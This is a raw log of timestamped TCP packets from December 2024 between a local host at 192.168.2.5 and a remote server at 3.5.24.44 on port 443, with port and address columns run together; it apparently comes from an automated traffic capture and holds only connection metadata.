                                                                                                                                                    Dec 12, 2024 18:02:04.683083057 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.683125973 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:04.683135986 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.683159113 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:04.683360100 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:04.683898926 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.729307890 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:04.821904898 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.821969032 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.822004080 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:04.822015047 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.822058916 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:04.822181940 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:04.822187901 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.829410076 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.829467058 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.829519987 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:04.829528093 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.829552889 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:04.837693930 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.837743998 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.837763071 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:04.837770939 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.837881088 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:04.846112967 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.846152067 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.846187115 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:04.846205950 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:04.846230984 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.646781921 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.646827936 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.654664040 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.654679060 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.654768944 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.654798031 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.654844046 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.654937983 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.662743092 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.662756920 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.662838936 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.662868023 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.670216084 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.670234919 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.670315981 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.670346975 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.713709116 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.785902023 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.785921097 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.785967112 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.786001921 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.786040068 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.786056042 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.786081076 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.793984890 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.794008017 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.794076920 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.794106007 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.794158936 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.824126959 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.824151039 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.824209929 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.824238062 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.824256897 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.824287891 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.831866980 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.831887007 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.831964016 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.831995010 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.832035065 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.839045048 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.839066982 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.839122057 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.839150906 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.839167118 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.839190006 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.847136974 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.847157001 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.847215891 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.847244024 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.847269058 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.847284079 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.854995012 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.855015039 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.855082035 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.855108023 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.855154037 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.862744093 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.862763882 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.862823009 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.862853050 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.862876892 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.862899065 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.979077101 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.979110956 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.979167938 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.979183912 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.979197979 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.979237080 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.986283064 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.986310005 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.986387968 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:05.986399889 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:05.986440897 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.019036055 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.019098997 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.019145966 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.019159079 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.019196033 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.019217968 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.024601936 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.024646044 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.024671078 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.024684906 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.024710894 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.024750948 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.032638073 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.032690048 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.032744884 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.032763004 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.032790899 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.032809973 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.039616108 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.039660931 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.039711952 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.039721966 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.039747953 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.039757967 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.047705889 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.047751904 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.047796011 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.047806025 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.047853947 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.055232048 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.055279970 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.055342913 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.055355072 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.055371046 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.055397034 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.212822914 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.212888002 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.212930918 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.212951899 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.212964058 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.212991953 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.220030069 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.220065117 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.220113039 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.220119953 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.220129013 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.220155954 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.227654934 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.227680922 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.227731943 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.227739096 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.227771044 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.227797031 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.235702991 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.235723972 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:06.235800028 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:06.235807896 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.011970043 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.018768072 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.018802881 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.018872976 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.018883944 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.018918991 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.024822950 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.024848938 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.024902105 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.024909973 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.024935961 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.024950981 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.030870914 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.030886889 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.030971050 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.030977011 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.031016111 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.036839008 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.036878109 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.036947966 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.036955118 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.036994934 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.175745010 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.175772905 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.175833941 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.175843000 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.175899029 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.182940960 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.182971954 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.183099985 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.183108091 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.183249950 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.190767050 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.190798998 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.190850973 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.190857887 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.190903902 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.198843002 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.198873997 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.198914051 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.198919058 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.198957920 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.206207991 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.206233978 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.206284046 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.206290007 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.206331968 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.214411020 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.214436054 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.214488983 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.214512110 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.214523077 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.214572906 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.221609116 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.221626043 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.221681118 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.221693993 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.221746922 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.229605913 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.229624987 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.229697943 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.229722023 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.229767084 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.368156910 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.368189096 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.368248940 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.368273020 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.368290901 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.368313074 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.375189066 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.375211000 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.375255108 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.375272989 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.375287056 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.375318050 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.383083105 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.383099079 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.383166075 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.383191109 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.383270025 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.391323090 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.391338110 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.391417027 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.391432047 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.391475916 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.398252964 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.398267984 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.398323059 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.398334026 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.398379087 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.406673908 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.406692028 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.406749964 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.406763077 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.406801939 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.413927078 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.413953066 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.414005041 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.414015055 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.414041042 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.414052963 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.422008991 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.422040939 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.422113895 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.422127962 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.422174931 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.560626984 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.560656071 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.560755014 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.560785055 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.560825109 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.567606926 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.567630053 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.567689896 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.567701101 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.567727089 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.567744017 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.575685024 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.575716972 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.575778008 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.575789928 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.575845003 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.583462954 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.583484888 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.583534002 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.583544016 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.583570957 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.583587885 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:07.590687990 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.590703964 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:07.590768099 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.368457079 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.368499041 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.376555920 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.376574039 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.376636982 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.376646042 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.376686096 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.384073019 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.384104013 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.384170055 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.384181976 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.384289026 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.522384882 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.522473097 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.522484064 CET443497603.5.24.44192.168.2.5
